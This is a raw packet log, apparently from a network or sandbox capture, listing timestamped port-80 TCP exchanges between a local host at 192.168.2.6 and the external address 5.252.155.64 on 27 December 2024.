                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.603056908 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.604576111 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.604634047 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.604686022 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.606220961 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.606276989 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.606302977 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.607841969 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.607886076 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.607939959 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.609486103 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.609530926 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.609594107 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.611107111 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.611151934 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.611198902 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.612770081 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.612813950 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.612879992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.614377022 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.614422083 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.614484072 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.616010904 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.616060019 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.616108894 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.617654085 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.617698908 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.617803097 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.619319916 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.619365931 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.619416952 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.620940924 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.620990992 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.621037006 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.622582912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.622632027 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.622693062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.624209881 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.624255896 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.624294043 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.625868082 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.625916958 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.625938892 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.627471924 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.627512932 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.627567053 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.629102945 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.629153967 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.629228115 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.630743027 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.630786896 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.630839109 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.632384062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.632425070 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.632474899 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.634033918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.634083986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.634114027 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.635695934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.635744095 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.635763884 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.637300968 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.637347937 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.637353897 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.638979912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.639029026 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.639096022 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.640567064 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.640614033 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.640675068 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.642225981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.642271996 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.642319918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.643881083 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.643915892 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.643923044 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.645478010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.645523071 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.645567894 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.647123098 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.647169113 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.647178888 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.695173025 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.751760960 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.751807928 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.751858950 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.752366066 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.752490997 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.752535105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.753643036 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.753745079 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.753789902 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.754935980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.755039930 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.755085945 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.756165981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.756254911 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.756309986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.757422924 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.757519960 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.757571936 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.758660078 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.758768082 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.758819103 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.759890079 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.759907961 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.759948015 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.761117935 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.761199951 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.761259079 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.762281895 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.762393951 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.762439966 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.763498068 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.763684034 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.763726950 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.764688015 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.764830112 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.764872074 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.765875101 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.765981913 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.766026020 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.767174006 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.767185926 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.767247915 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.768183947 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.768384933 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.768426895 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.769326925 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.769503117 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.769551992 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.770483971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.770580053 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.770626068 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.771615982 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.771733999 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.771778107 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.772748947 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.772851944 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.772902012 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.773883104 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.774044991 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.774094105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.775022984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.775130987 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.775182009 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.776153088 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.776278973 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.776323080 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.777298927 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.777409077 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.777451038 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.778495073 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.778568029 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.778610945 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.779575109 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.779697895 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.779742002 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.780725002 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.780848980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.780894041 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.781862974 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.781956911 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.782001972 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.783062935 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.783153057 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.783198118 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.784147024 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.784256935 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.784296036 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.785279989 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.785403967 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.785453081 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.786437035 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.786534071 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.786583900 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.787563086 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.787667990 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.787717104 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.788772106 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.788892031 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.788938999 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.789845943 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.789948940 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.789994955 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.791099072 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.791111946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.791171074 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.792131901 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.792228937 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.792272091 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.793252945 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.793384075 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.793428898 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.794440031 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.794459105 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.794517994 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.795552969 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.795661926 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.795711994 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.796673059 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.796773911 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.796834946 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.797862053 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.797979116 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.798027039 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.798996925 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.799091101 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.799145937 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.800103903 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.800209999 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.800268888 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.801249981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.801353931 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.801398039 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.802386045 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.802450895 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.802505016 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.803507090 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.803719997 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.803765059 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.804656982 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.804805994 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.804843903 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.805799007 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.805895090 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.805948973 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.806972980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.807048082 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.807135105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.808099985 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.808181047 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.808232069 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.809212923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.809362888 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.809406042 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.810374022 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.810441017 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.810488939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.811476946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.811634064 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.811691999 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.812581062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.867038012 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.943656921 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.943700075 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.943774939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.944192886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.944259882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.944304943 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.945297003 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.945348978 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.945394039 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.946341038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.946439981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.946485043 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.947487116 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.947535038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.947587967 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.948551893 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.948601007 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.948643923 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.949557066 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.949656010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.949708939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.950649023 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.950756073 CET80497735.252.155.64192.168.2.6
